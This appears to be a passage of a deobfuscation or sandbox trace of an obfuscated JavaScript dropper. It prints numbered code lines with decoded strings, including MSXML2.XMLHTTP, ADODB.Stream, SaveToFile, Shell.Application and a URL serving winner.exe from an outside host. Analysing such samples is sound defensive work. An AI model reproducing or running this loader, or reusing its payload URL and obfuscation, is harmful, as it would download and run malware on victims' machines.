                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                111
                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                  112
                                                                                                                                                                                                                                                  return _0x512427;
                                                                                                                                                                                                                                                    113
                                                                                                                                                                                                                                                    };
                                                                                                                                                                                                                                                      114
                                                                                                                                                                                                                                                      _0x3dc1[_0x1cea0e ( 0xc5 ) ] = _0xe1f1d8, _0x4f764a = arguments, _0x3dc1[_0x4157dc ( 0x9e, '97o1' ) ] = ! ! [];
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      115
                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                        116
                                                                                                                                                                                                                                                        var _0x5cb8e6 = _0x8d1f9c[0x0], _0x3001a4 = _0x12991c + _0x5cb8e6, _0x198f8b = _0x4f764a[_0x3001a4];
                                                                                                                                                                                                                                                          117
                                                                                                                                                                                                                                                          return ! _0x198f8b ? ( _0x3dc1[_0x1cea0e ( 0xb9 ) ] === undefined && ( _0x3dc1[_0x4157dc ( 0xaa, 'CsYt' ) ] = ! ! [] ), _0x3a7298 = _0x3dc1[_0x1cea0e ( 0xc5 ) ] ( _0x3a7298, _0x2f9be2 ), _0x4f764a[_0x3001a4] = _0x3a7298 ) : _0x3a7298 = _0x198f8b, _0x3a7298;
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("DeleteFile","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("438285eiwTzG","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("https://hirosguide.hu/ti/winner.exe","3o8g") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WPZdJwWYW5RcT3RdGGGnlgBcSq","0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Open","3o8g") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("891608JWBVoS","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Close","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa","0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","3o8g") ➔ "GET"
                                                                                                                                                                                                                                                          118
                                                                                                                                                                                                                                                          }, _0x3dc1 ( _0x4f764a, _0x21d3ac );
                                                                                                                                                                                                                                                            119
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              120
                                                                                                                                                                                                                                                              ( function (_0x1ca879, _0x2c796b) {
                                                                                                                                                                                                                                                              • (function _0x4495(),289452) ➔ undefined
                                                                                                                                                                                                                                                              • (function _0x4495(),289452) ➔ undefined
                                                                                                                                                                                                                                                              121
                                                                                                                                                                                                                                                              var _0x30bab5 = _0x10bd, _0x11be6c = _0x38e1, _0x31cc7d = _0x31b8, _0x3cfdf4 = _0x3dc1, _0x136e36 = _0x1ca879 ( );
                                                                                                                                                                                                                                                              • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                              122
                                                                                                                                                                                                                                                              while (! ! [ ] )
                                                                                                                                                                                                                                                                123
                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                  124
                                                                                                                                                                                                                                                                  try
                                                                                                                                                                                                                                                                    125
                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                      126
                                                                                                                                                                                                                                                                      var _0x419b7e = - parseInt ( _0x3cfdf4 ( 0x201, '0zEZ' ) ) / 0x1 * ( parseInt ( _0x3cfdf4 ( 0x1fd, '3o8g' ) ) / 0x2 ) + - parseInt ( _0x31cc7d ( 0x1f2 ) ) / 0x3 + parseInt ( _0x3cfdf4 ( 0x1f8, _0x11be6c ( 0xa8, 'H9oj' ) ) ) / 0x4 * ( - parseInt ( _0x3cfdf4 ( 0x1ff, _0x11be6c ( 0xce, 'oC51' ) ) ) / 0x5 ) + - parseInt ( _0x3cfdf4 ( 0x1f4, _0x30bab5 ( 0xbb ) ) ) / 0x6 + parseInt ( _0x31cc7d ( 0x1ed ) ) / 0x7 + - parseInt ( _0x31cc7d ( 0x1f5 ) ) / 0x8 * ( parseInt ( _0x3cfdf4 ( 0x207, _0x30bab5 ( 0xc2 ) ) ) / 0x9 ) + parseInt ( _0x31cc7d ( 0x200 ) ) / 0xa;
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                                                                      • parseInt("i\x05V") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                                                                      • parseInt("\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                                                                      • parseInt("\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ "GET"
                                                                                                                                                                                                                                                                      • parseInt("GET") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                      • parseInt("SaveToFile") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ "\x92W\xf1\x19\xb7\xaa]g"
                                                                                                                                                                                                                                                                      • parseInt("\x92W\xf1\x19\xb7\xaa]g") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "\xfax\x9a\x80\xd9\xc9o\xa4\x1a!\xab\x00l"
                                                                                                                                                                                                                                                                      • parseInt("\xfax\x9a\x80\xd9\xc9o\xa4\x1a!\xab\x00l") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                      • parseInt("W7mUrSkZ") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ "\x05@f\xa5\x90\xc7\xb1\x85"
                                                                                                                                                                                                                                                                      • parseInt("\x05@f\xa5\x90\xc7\xb1\x85") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("t\xaf\xea\x12") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "\xbc\x17\xf3\x14\xdb\xf3\xe4n"
                                                                                                                                                                                                                                                                      • parseInt("\xbc\x17\xf3\x14\xdb\xf3\xe4n") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                      • parseInt("2383633jjSiic") ➔ 2383633
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "\xcad\xeb"
                                                                                                                                                                                                                                                                      • parseInt("\xcad\xeb") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("\x1cw55^\x01\xfc}\xdc\xe5C") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "+\x00d\xa8\xfc\x9e\x08\x8c"
                                                                                                                                                                                                                                                                      • parseInt("+\x00d\xa8\xfc\x9e\x08\x8c") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "Send"
                                                                                                                                                                                                                                                                      • parseInt("Send") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "wY%\xfdfC\xc3\xbe\x9aV\x86Z\xb6"
                                                                                                                                                                                                                                                                      • parseInt("wY%\xfdfC\xc3\xbe\x9aV\x86Z\xb6") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("5\xaf\x1e\xf6a") ➔ 5
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("B\x1f\x0c\xcf o\x9e\xbc\x19B\x9c\xe3") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("7iqMrNm") ➔ 7
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "27782XEtVAz"
                                                                                                                                                                                                                                                                      • parseInt("27782XEtVAz") ➔ 27782
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                      • parseInt("438285eiwTzG") ➔ 438285
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "16LidyHt"
                                                                                                                                                                                                                                                                      • parseInt("16LidyHt") ➔ 16
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ "285545VUltfC"
                                                                                                                                                                                                                                                                      • parseInt("285545VUltfC") ➔ 285545
                                                                                                                                                                                                                                                                      • _0x30bab5(187) ➔ "3rnQ"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(500,"3rnQ") ➔ "1797552RzGxfG"
                                                                                                                                                                                                                                                                      • parseInt("1797552RzGxfG") ➔ 1797552
                                                                                                                                                                                                                                                                      • _0x31b8(493) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                      • parseInt("2383633jjSiic") ➔ 2383633
                                                                                                                                                                                                                                                                      • _0x31b8(501) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                      • parseInt("891608JWBVoS") ➔ 891608
                                                                                                                                                                                                                                                                      • _0x30bab5(194) ➔ "cz*B"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(519,"cz*B") ➔ "45obifie"
                                                                                                                                                                                                                                                                      • parseInt("45obifie") ➔ 45
                                                                                                                                                                                                                                                                      • _0x31b8(512) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                      • parseInt("12775480EBnljO") ➔ 12775480
                                                                                                                                                                                                                                                                      127
                                                                                                                                                                                                                                                                      if ( _0x419b7e === _0x2c796b )
                                                                                                                                                                                                                                                                        128
                                                                                                                                                                                                                                                                        break ;
                                                                                                                                                                                                                                                                          129
                                                                                                                                                                                                                                                                          else
                                                                                                                                                                                                                                                                            130
                                                                                                                                                                                                                                                                            _0x136e36['push'] ( _0x136e36[_0x11be6c ( 0xbf, 'vv]U' ) ] ( ) );
                                                                                                                                                                                                                                                                              131
                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                132
                                                                                                                                                                                                                                                                                catch ( _0x43e41f )
                                                                                                                                                                                                                                                                                  133
                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                    134
                                                                                                                                                                                                                                                                                    _0x136e36[_0x11be6c ( 0x99, 'Pq8!' ) ] ( _0x136e36['shift'] ( ) );
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
                                                                                                                                                                                                                                                                                    135
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      136
                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                        137
                                                                                                                                                                                                                                                                                        } ( _0x4495, 0x46aac ) );
                                                                                                                                                                                                                                                                                          138
                                                                                                                                                                                                                                                                                          function _0x4495() {
                                                                                                                                                                                                                                                                                          • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                                                          139
                                                                                                                                                                                                                                                                                          var _0x44a08c = _0x38e1, _0x15f00a = _0x10bd, _0x238569 = [ 'Shell.Application', _0x15f00a ( 0xa3 ), _0x15f00a ( 0xaf ), _0x44a08c ( 0xa5, 'nXvR' ), 'FvRdQKKo', 'cSoQW7HWyKGYW5pcGCokiSk7', '12775480EBnljO', _0x15f00a ( 0xcb ), _0x15f00a ( 0xd0 ), _0x15f00a ( 0xb3 ), _0x44a08c ( 0xd8, 'B5jQ' ), _0x44a08c ( 0xd1, 'L)v3' ), _0x15f00a ( 0xbd ), 'b8kDW4nLumkfwrG', _0x44a08c ( 0xa0, 'KzLL' ), _0x15f00a ( 0xa7 ), 'SaveToFile', _0x15f00a ( 0x9f ), _0x15f00a ( 0xac ), _0x15f00a ( 0xcc ), _0x15f00a ( 0xb2 ), _0x44a08c ( 0xba, 'Pq8!' ), _0x15f00a ( 0xd6 ), 'https://hirosguide.hu/ti/winner.exe', _0x15f00a ( 0xa9 ), _0x44a08c ( 0xc4, '2]Vf' ), _0x44a08c ( 0x9a, ']9d%' ), _0x15f00a ( 0xb5 ), _0x15f00a ( 0xa2 ), _0x44a08c ( 0xb0, 'uW23' ), _0x15f00a ( 0xd9 ), 'WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa', _0x15f00a ( 0x9c ), _0x15f00a ( 0xbc ) ];
                                                                                                                                                                                                                                                                                          • _0x15f00a(163) ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                          • _0x15f00a(175) ➔ "pfOEWQ0"
                                                                                                                                                                                                                                                                                          • _0x44a08c(165,"nXvR") ➔ "vmkcW4hcIJeMubjeBCo9"
                                                                                                                                                                                                                                                                                          • _0x15f00a(203) ➔ "F8kCWOxdSH1PW4e"
                                                                                                                                                                                                                                                                                          • _0x15f00a(208) ➔ "W5BcVetcV8osW7zdW68"
                                                                                                                                                                                                                                                                                          • _0x15f00a(179) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                          • _0x44a08c(216,"B5jQ") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                          • _0x44a08c(209,"L)v3") ➔ "45obifie"
                                                                                                                                                                                                                                                                                          • _0x15f00a(189) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                          • _0x44a08c(160,"KzLL") ➔ "tHKTWPXJW6aHEvJcUYmH"
                                                                                                                                                                                                                                                                                          • _0x15f00a(167) ➔ "gM3dJZ48WOy8WOFdMsZdQCkaW7S"
                                                                                                                                                                                                                                                                                          • _0x15f00a(159) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                          • _0x15f00a(172) ➔ "Type"
                                                                                                                                                                                                                                                                                          • _0x15f00a(204) ➔ "whGqWOWIpCkIW71DWQruaW"
                                                                                                                                                                                                                                                                                          • _0x15f00a(178) ➔ "dmoHW7v3BKGbW6/cMSoQpSk/"
                                                                                                                                                                                                                                                                                          • _0x44a08c(186,"Pq8!") ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                          • _0x15f00a(214) ➔ "Send"
                                                                                                                                                                                                                                                                                          • _0x15f00a(169) ➔ "Open"
                                                                                                                                                                                                                                                                                          • _0x44a08c(196,"2]Vf") ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                          • _0x44a08c(154,"]9d%") ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                          • _0x15f00a(181) ➔ "iCoWWQi"
                                                                                                                                                                                                                                                                                          • _0x15f00a(162) ➔ "WPZdJwWYW5RcT3RdGGGnlgBcSq"
                                                                                                                                                                                                                                                                                          • _0x44a08c(176,"uW23") ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                          • _0x15f00a(217) ➔ "Close"
                                                                                                                                                                                                                                                                                          • _0x15f00a(156) ➔ "W5RcOGxcPSoyWO3dSqG"
                                                                                                                                                                                                                                                                                          • _0x15f00a(188) ➔ "tCk1WPiAW7/dOb3dQG"
                                                                                                                                                                                                                                                                                          140
                                                                                                                                                                                                                                                                                          return _0x4495 =
                                                                                                                                                                                                                                                                                            141
                                                                                                                                                                                                                                                                                            function () {
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream
